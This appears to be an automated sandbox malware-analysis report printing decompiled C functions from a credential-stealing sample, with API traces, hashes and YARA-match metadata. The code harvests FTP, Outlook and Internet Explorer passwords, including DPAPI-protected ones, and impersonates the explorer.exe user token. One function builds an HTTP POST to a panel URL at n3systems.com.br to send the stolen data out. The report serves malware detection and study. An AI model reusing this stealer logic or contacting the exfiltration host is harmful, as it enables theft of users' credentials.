                                                                        • API String ID: 0-1526611526
                                                                        • Opcode ID: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
                                                                        • Instruction ID: 96101fffbdba439034eac4df85c0c476d3f464cc9ab40425e2c0fc1f81b8675a
                                                                        • Opcode Fuzzy Hash: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
                                                                        • Instruction Fuzzy Hash: C391597190420AEADF21AFA1DD46BEEBAB1AF54308F24403BF011B11E2D7BD0D91DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A88E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				CHAR* _v8;
                                                                        				CHAR* _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				CHAR* _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr* _v56;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				char _v68;
                                                                        
                                                                        				_v8 = E004017EC(0x2000);
                                                                        				_v12 = E004017EC(0x2000);
                                                                        				_v16 = E004017EC(0x2000);
                                                                        				_v20 = E004017EC(0x2000);
                                                                        				_v24 = E004017EC(0x2000);
                                                                        				_v28 = E004017EC(0x2000);
                                                                        				_v32 = E004017EC(0x2000);
                                                                        				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
                                                                        				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
                                                                        				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
                                                                        				wsprintfA(_v20, "SiteServer %d-User", _a12);
                                                                        				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
                                                                        				wsprintfA(_v28, "%s\\Keychain", _a8);
                                                                        				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
                                                                        				_v36 = E00401C8E( *0x4140fe, _a8, _v8, 0);
                                                                        				_v40 = E00401C8E( *0x4140fe, _a8, _v12, 0);
                                                                        				_v44 = E00401C8E( *0x4140fe, _a8, _v16, 0);
                                                                        				_v48 = E00401C8E( *0x4140fe, _v28, _v20, 0);
                                                                        				_v52 = E00401C8E( *0x4140fe, _v28, _v24, 0);
                                                                        				_v56 = E00401C8E( *0x4140fe, _a8, _v32,  &_v68);
                                                                        				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040A774(_v48,  &_v64) != 0 && _v64 != 0 && E0040A774(_v52,  &_v60) != 0 && _v60 != 0) {
                                                                        					E00401486(_a4, 0xbeef0010);
                                                                        					E004014E8(_a4, _v36);
                                                                        					E004014E8(_a4, _v40);
                                                                        					E004014E8(_a4, _v44);
                                                                        					E004014BC(_a4, _v48, _v64);
                                                                        					E004014BC(_a4, _v52, _v60);
                                                                        					if(_v56 == 0 || _v68 != 4) {
                                                                        						E00401486(_a4, 0);
                                                                        					} else {
                                                                        						E00401486(_a4,  *_v56);
                                                                        					}
                                                                        				}
                                                                        				E004017D5(_v8);
                                                                        				E004017D5(_v12);
                                                                        				E004017D5(_v16);
                                                                        				E004017D5(_v20);
                                                                        				E004017D5(_v24);
                                                                        				E004017D5(_v28);
                                                                        				E004017D5(_v32);
                                                                        				E004017D5(_v36);
                                                                        				E004017D5(_v40);
                                                                        				E004017D5(_v44);
                                                                        				E004017D5(_v48);
                                                                        				E004017D5(_v52);
                                                                        				return E004017D5(_v56);
                                                                        			}




















                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • wsprintfA.USER32 ref: 0040A8FA
                                                                        • wsprintfA.USER32 ref: 0040A90D
                                                                        • wsprintfA.USER32 ref: 0040A920
                                                                        • wsprintfA.USER32 ref: 0040A933
                                                                        • wsprintfA.USER32 ref: 0040A946
                                                                        • wsprintfA.USER32 ref: 0040A959
                                                                        • wsprintfA.USER32 ref: 0040A96C
                                                                          • Part of subcall function 0040A774: lstrlenA.KERNEL32(?), ref: 0040A789
                                                                          • Part of subcall function 0040A774: LocalFree.KERNEL32(00000000), ref: 0040A874
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wsprintf$Locallstrlen$AllocFree
                                                                        • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                                        • API String ID: 2275035253-1012938452
                                                                        • Opcode ID: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
                                                                        • Instruction ID: 9451ae28163268872172244b5ac3737368aa19c67849d8b2cc615b1fa428e2da
                                                                        • Opcode Fuzzy Hash: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
                                                                        • Instruction Fuzzy Hash: B661A635940209FBDF126FE2DD46AEDBA72AF04314F14803AF510351F2E77A4964EB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00403B74(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
                                                                        				long _v16;
                                                                        				void* _v20;
                                                                        				signed int _v40;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v64;
                                                                        				intOrPtr _v68;
                                                                        				CHAR* _v72;
                                                                        				char* _v76;
                                                                        				int _v80;
                                                                        				long _v84;
                                                                        				long _v88;
                                                                        				intOrPtr _v92;
                                                                        				char _v96;
                                                                        				int _t83;
                                                                        				int _t89;
                                                                        				int _t91;
                                                                        				int _t95;
                                                                        				int _t99;
                                                                        				int _t104;
                                                                        				void* _t110;
                                                                        
                                                                        				_t110 = __edx;
                                                                        				_v88 = 0;
                                                                        				_t104 = 0;
                                                                        				_v68 = E004017EC(0x1000);
                                                                        				_v76 = E004017EC(0x1000);
                                                                        				_v72 = E004017EC(0x1000);
                                                                        				_v92 = E004017EC(0x1000);
                                                                        				_v96 = 0x1000;
                                                                        				memset( &_v64, 0, 0x3c << 0);
                                                                        				_v64 = 0x3c;
                                                                        				_push(_v68);
                                                                        				_pop( *_t11);
                                                                        				_push(_v76);
                                                                        				_pop( *_t13);
                                                                        				_v44 = 0xfff;
                                                                        				_v16 = 0xfff;
                                                                        				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
                                                                        				} else {
                                                                        					_v84 = 0xfff;
                                                                        					_t83 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
                                                                        					__eflags = _t83;
                                                                        					if(_t83 != 0) {
                                                                        						 *_v76 = 0;
                                                                        						memset( &_v64, 0, 0x3c << 0);
                                                                        						_v64 = 0x3c;
                                                                        						_push(_v76);
                                                                        						_pop( *_t28);
                                                                        						_v44 = 0xfff;
                                                                        						_v16 = 0xfff;
                                                                        						_t89 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
                                                                        						__eflags = _t89;
                                                                        						if(_t89 == 0) {
                                                                        							L7:
                                                                        							L21:
                                                                        							E004017D5(_v68);
                                                                        							E004017D5(_v72);
                                                                        							E004017D5(_v76);
                                                                        							E004017D5(_v92);
                                                                        							if(_v88 != 0) {
                                                                        								E004017D5(_v88);
                                                                        							}
                                                                        							return _t104;
                                                                        						}
                                                                        						__eflags = _v48;
                                                                        						if(_v48 != 0) {
                                                                        							_t91 =  &_v96;
                                                                        							_push(_t91);
                                                                        							_push(_v92);
                                                                        							_push(0);
                                                                        							L00410E54();
                                                                        							__eflags = _t91;
                                                                        							if(_t91 < 0) {
                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
                                                                        							} else {
                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v92);
                                                                        							}
                                                                        							_t95 = E00403749(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
                                                                        							__eflags = _t95;
                                                                        							if(_t95 != 0) {
                                                                        								_v80 = _t95;
                                                                        								E00403B46(_v80);
                                                                        								_t99 = E004037CD(_v80, _v72, lstrlenA(_v72));
                                                                        								__eflags = _t99;
                                                                        								if(_t99 != 0) {
                                                                        									__eflags = _a12;
                                                                        									if(_a12 == 0) {
                                                                        										L18:
                                                                        										_t104 = _t99;
                                                                        										__eflags = _t104;
                                                                        										if(__eflags != 0) {
                                                                        											_t104 = E004039C1(_t110, __eflags, _v80, _a16,  &_v88);
                                                                        										}
                                                                        										L20:
                                                                        										_push(_v80);
                                                                        										L00410E72();
                                                                        										goto L21;
                                                                        									}
                                                                        									_t99 = E004037CD(_v80, _a8, _a12);
                                                                        									__eflags = _t99;
                                                                        									if(_t99 != 0) {
                                                                        										goto L18;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L20;
                                                                        							} else {
                                                                        								goto L21;
                                                                        							}
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        				}
                                                                        			}

























                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403BFB
                                                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403C26
                                                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403C6C
                                                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 00403C89
                                                                        • wsprintfA.USER32 ref: 00403CA6
                                                                        • wsprintfA.USER32 ref: 00403CC6
                                                                          • Part of subcall function 00403B46: setsockopt.WSOCK32(00000000,0000FFFF,00000080,00000001,00000004), ref: 00403B6B
                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403CF1
                                                                        • closesocket.WSOCK32(?,?,?,00000000,?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403D3C
                                                                        Strings
                                                                        • http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00403B7A
                                                                        • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 00403CB0
                                                                        • <, xrefs: 00403C46
                                                                        • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 00403C9E, 00403CBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
                                                                        • String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                                                                        • API String ID: 963220733-3240631248
                                                                        • Opcode ID: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
                                                                        • Instruction ID: e979f89f125927e8ba2600574156917aa8cba9cf8a6433267ee3f1946e8ad0ea
                                                                        • Opcode Fuzzy Hash: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
                                                                        • Instruction Fuzzy Hash: A351F772D00248EAEF11AFD1CC42BEDBFB9AF04345F14403AF510B61A1D7B95A95DB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040F5D2(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				char _v3076;
                                                                        				int _v3080;
                                                                        				int _v3084;
                                                                        				intOrPtr _v3088;
                                                                        				char _v3092;
                                                                        				char _v3096;
                                                                        				char _v3100;
                                                                        				intOrPtr _v3104;
                                                                        				void* _t56;
                                                                        				int _t61;
                                                                        				void* _t66;
                                                                        
                                                                        				_t66 = __ecx;
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				E00409F46(_a4, _a8,  &_v2052, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
                                                                        				_v3092 = 0x10;
                                                                        				_v3088 = 2;
                                                                        				_v3084 = 0;
                                                                        				_v3080 = 0;
                                                                        				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
                                                                        				if(_v3100 == 0 || _v3096 == 0) {
                                                                        					return _t56;
                                                                        				} else {
                                                                        					if(lstrcmpiA( &_v1028, "identification") == 0) {
                                                                        						L4:
                                                                        						_v3104 = 0xbeef0005;
                                                                        						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
                                                                        							L7:
                                                                        							if(_v3104 != 0xbeef0007) {
                                                                        								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
                                                                        							} else {
                                                                        								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
                                                                        							}
                                                                        							L10:
                                                                        							_push(_v3096);
                                                                        							L00410DCA();
                                                                        							return _t61;
                                                                        						}
                                                                        						_v3104 = 0xbeef0006;
                                                                        						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
                                                                        							goto L7;
                                                                        						}
                                                                        						_v3104 = 0xbeef0007;
                                                                        						_t61 = lstrcmpiA( &_v2052, "identities");
                                                                        						if(_t61 != 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        					_t61 = lstrcmpiA( &_v1028, "identitymgr");
                                                                        					if(_t61 != 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                          • Part of subcall function 00409F46: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F82
                                                                          • Part of subcall function 00409F46: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F8B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F61B
                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0040F69B
                                                                        • lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 0040F6B0
                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 0040F6D3
                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F6F2
                                                                        • lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F711
                                                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F772
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                        • API String ID: 636431001-4287852900
                                                                        • Opcode ID: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
                                                                        • Instruction ID: ea03687d9fb03fd5940d117c1db2d536975b738c704b47cbe732ea10429568b2
                                                                        • Opcode Fuzzy Hash: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
                                                                        • Instruction Fuzzy Hash: 2C412B7180021DEBEF319F91CE41FDA7B7ABF05304F0041A6BA08B6091DB799AD99F95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				int _v2056;
                                                                        				int _v2060;
                                                                        				intOrPtr _v2064;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				char _v2076;
                                                                        				void* _v2080;
                                                                        				char _v2084;
                                                                        				void* _v2088;
                                                                        				char _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				void* _t53;
                                                                        				int _t58;
                                                                        
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
                                                                        				_v2068 = 0x10;
                                                                        				_v2064 = 2;
                                                                        				_v2060 = 0;
                                                                        				_v2056 = 0;
                                                                        				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
                                                                        				if(_v2076 == 0 || _v2072 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_v2096 = 0xbeef0000;
                                                                        				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
                                                                        					L5:
                                                                        					_t58 = StrStrIA( &_v2052, "DPAPI: ");
                                                                        					if(_t58 == 0) {
                                                                        						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
                                                                        					} else {
                                                                        						if( *0x41442d != 0) {
                                                                        							_push(_v2076);
                                                                        							_pop( *_t29);
                                                                        							_push(_v2072);
                                                                        							_pop( *_t31);
                                                                        							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
                                                                        							if(_t58 != 0) {
                                                                        								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
                                                                        								_t58 = LocalFree(_v2088);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					_push(_v2072);
                                                                        					L00410DCA();
                                                                        					return _t58;
                                                                        				}
                                                                        				_v2096 = 0xbeef0001;
                                                                        				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				_v2096 = 0xbeef0002;
                                                                        				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
                                                                        				if(_t58 != 0) {
                                                                        					goto L11;
                                                                        				}
                                                                        				goto L5;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
                                                                        • LocalFree.KERNEL32(?), ref: 0040A331
                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$Local
                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                        • API String ID: 1761448497-3076635702
                                                                        • Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
                                                                        • Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040BEFE(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				char _v40;
                                                                        				char* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _t49;
                                                                        				int _t62;
                                                                        				int _t76;
                                                                        				void* _t79;
                                                                        
                                                                        				_t79 = __ecx;
                                                                        				if(_a16 != 0) {
                                                                        					_t49 = _a16;
                                                                        					if( *0x419158 < _t49 &&  *0x41915c < _t49 &&  *0x419160 < _t49) {
                                                                        						E0040B1AB(_a12,  *0x419158,  &_v8,  &_v12,  &_v16);
                                                                        						E0040B1AB(_a12,  *0x419160,  &_v20,  &_v24,  &_v28);
                                                                        						_t49 = E0040B1AB(_a12,  *0x41915c,  &_v32,  &_v36,  &_v40);
                                                                        						if(_v8 != 0 && _v32 != 0) {
                                                                        							_v44 = E004017EC(_v8 + 1);
                                                                        							_t62 = E00401823(_v16, _v44, _v8);
                                                                        							_v48 = 0;
                                                                        							_v52 = 0;
                                                                        							if( *0x415824 != 0) {
                                                                        								if( *0x415824 != 1) {
                                                                        									if( *0x415824 == 2) {
                                                                        										_t62 = 0;
                                                                        									}
                                                                        								} else {
                                                                        									_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
                                                                        								if(_t76 != 0) {
                                                                        									_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
                                                                        								}
                                                                        								_t62 = _t76;
                                                                        								if(_t62 != 0) {
                                                                        									_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
                                                                        								}
                                                                        							}
                                                                        							if(_t62 == 0) {
                                                                        								if(_v20 != 0) {
                                                                        									_v48 = E00408FA6(_t79, _v28, _v20);
                                                                        								}
                                                                        								_v52 = E00408FA6(_t79, _v40, _v32);
                                                                        								if(_v44 != 0 && _v52 != 0) {
                                                                        									E00401486(_a8, _a20);
                                                                        									E004014E8(_a8, _v44);
                                                                        									E004014E8(_a8, _v48);
                                                                        									E004014E8(_a8, _v52);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v48);
                                                                        							E004017D5(_v52);
                                                                        							return E004017D5(_v44);
                                                                        						}
                                                                        					}
                                                                        					return _t49;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 0040BFCE
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFDC
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFEA
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFF8
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C006
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C014
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ftp.$ftp://$http://$https://
                                                                        • API String ID: 1659193697-2878239594
                                                                        • Opcode ID: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
                                                                        • Instruction ID: 2e0af54665fa65f75f976fb34723a380399be05cd310afd3f545fa98bd27941c
                                                                        • Opcode Fuzzy Hash: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
                                                                        • Instruction Fuzzy Hash: C941FC7280010AEBDF11AFE1DD45AEE7BB9AB08314F14823BF510B11B1D77D49A0EB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00402D57(void* __ebx) {
                                                                        				int _t25;
                                                                        				void* _t33;
                                                                        				void* _t36;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        
                                                                        				_t49 = __ebx;
                                                                        				while(1) {
                                                                        					L15:
                                                                        					while(1) {
                                                                        						L17:
                                                                        						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        						L1:
                                                                        						if(_t25 != 0) {
                                                                        							L2:
                                                                        							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
                                                                        								L17:
                                                                        								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        								goto L1;
                                                                        							} else {
                                                                        								L3:
                                                                        								 *(_t52 - 0x13c) = 0;
                                                                        								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
                                                                        								_t51 =  *(_t52 - 0x13c);
                                                                        								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
                                                                        									continue;
                                                                        								} else {
                                                                        									L5:
                                                                        									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
                                                                        									if(_t36 == 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L6:
                                                                        										 *(_t52 - 8) = _t36;
                                                                        										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
                                                                        											CloseHandle( *(_t52 - 8));
                                                                        											continue;
                                                                        											do {
                                                                        												do {
                                                                        													do {
                                                                        														goto L17;
                                                                        													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
                                                                        													goto L3;
                                                                        												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
                                                                        												goto L5;
                                                                        											} while (_t36 == 0);
                                                                        											goto L6;
                                                                        										} else {
                                                                        											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
                                                                        												CloseHandle( *(_t52 - 4));
                                                                        												CloseHandle( *(_t52 - 8));
                                                                        												goto L15;
                                                                        											} else {
                                                                        												_t49 = _t49 + 1;
                                                                        												 *(_t52 - 0x140) = 0;
                                                                        												_t45 = _t52 - 0x140;
                                                                        												_push(_t45);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
                                                                        													 *0x4140fe =  *(_t52 - 0x140);
                                                                        												}
                                                                        												if( *((intOrPtr*)(_t52 + 8)) != 0) {
                                                                        													 *__eax =  *(_t52 - 4);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						CloseHandle( *(_t52 - 0x138));
                                                                        						return _t49;
                                                                        					}
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
